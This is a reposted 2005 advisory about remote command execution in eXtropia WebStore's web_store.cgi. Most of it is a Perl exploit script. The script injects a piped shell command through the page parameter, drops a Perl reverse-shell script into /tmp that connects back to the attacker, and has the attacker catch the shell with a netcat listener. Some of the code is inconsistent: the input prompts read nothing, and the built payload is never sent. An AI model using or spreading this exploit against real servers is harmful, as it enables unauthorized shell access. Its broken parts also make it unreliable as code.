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eXtropia WebStore Remote Command Execution
来源:www.ashiyane.com 作者:sun-os 发布时间:2005-06-22  

eXtropia WebStore Remote Command Execution (web_store.cgi)

"WebStore merges both the Electronic Outlet HTML and Database versions and adds all new routines for error handling, order processing, encrypted mailing, frames, Javascript and VBscript and other goodies."

WebStore is vulnerable to a remote command execution, exploiting this vulnerability allows malicious remote attacker to execute arbitrary code on vulnerable system, the following exploit code can be used to test your system for the mentioned vulnerability.

The information has been provided by SegmentationFault Group.

#!/usr/bin/perl -w
# Remote Command Execution Vulnerability In Web_store.cgi *
# *
# [SegmentationFault Group] *
# *
# *
# Greetz to : Xsupr3mo - failed - Status-x - Stealh - P3S4D3L0 *
# Greetz to : berhooz - nima - ehsan - Unknown OutLaw eutanasia *
# www.ashiyane.com *
# *
#ok setp by setp to work : * *
#[*] start exploit * If connect back shell not found: maybe :*
#[*] run in your system: nc -l -vv -p 2975 * you do not have perm to write in /tmp *
#[*] starting connect back on :2975 * Shell not vulnerable *
#[*] DONE! * test and put in /$path/hints.pl?|cd /tmp*
#[*] Look netcat windows * other path that u know dont have perm *
# * *
use IO::Socket;

print "*********************************\n";
print "\tRemote Command Execution Vulnerability in web_store.cgi\n ";
print "\t\t-=[ SegmentationFault Group ]=-\n";
print "\t\tcode writen by sun-os [ActionSpider]\n\n";
print "\tGerttz to : Xsupr3mo - failed - Status-x - Stealh";
print "\n\tand : Behrooz - nima - ehsan www.ashiyane.com\n";
print "*********************************\n\n";

print "enter hostname or ip : \n";

print "port: (default: 80)\n";
$port=80 if ($port =~/\D/ );
$port=80 if ($port eq "" );

print "path: (???/web_store.cgi?)\n";

print "your ip (for reverse connect): \n";

print "your port (for reverse connect): \n";

print "ok Remote Command Execution now Start";
print "|+| try to exploiting...\n";

$string="/$path/web_store.cgi?page=.html|cd /tmp;echo ".q{use Socket;$execute= 'echo "`uname -a`";echo "`id`";/bin/sh';$target=$ARGV[0];$port=$ARGV[1];$iaddr=inet_aton($target) || die("Error: $!\n");$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");$proto=getprotobyname('tcp');socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");connect(SOCKET, $paddr) || die("Error: $!\n");open(STDIN, ">&SOCKET");open(STDOUT, ">&SOCKET");open(STDERR, ">&SOCKET");system($execute);close(STDIN)}." >>dc.pl;perl dc.pl $ip $reverse|";

print "|+| OK! \n";
print "|+| NOW, run in your system: nc -l -vv -p $reverse\n";
print "|+| starting connect back on $ip :$reverse\n";
print "|+| DONE!\n";
print "|+| Look netcat windows\n\n";
$socket=IO::Socket::INET->new( PeerAddr => $server, PeerPort => $port, Proto => tcp)
or die;

print $socket "POST $path HTTP/1.1\n";
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "User-Agent: blackbox\n";
print $socket "Pragma: no-cache\n";
print $socket "Cache-Control: no-cache\n";
print $socket "Connection: close\n\n";

print "have nice shell...";

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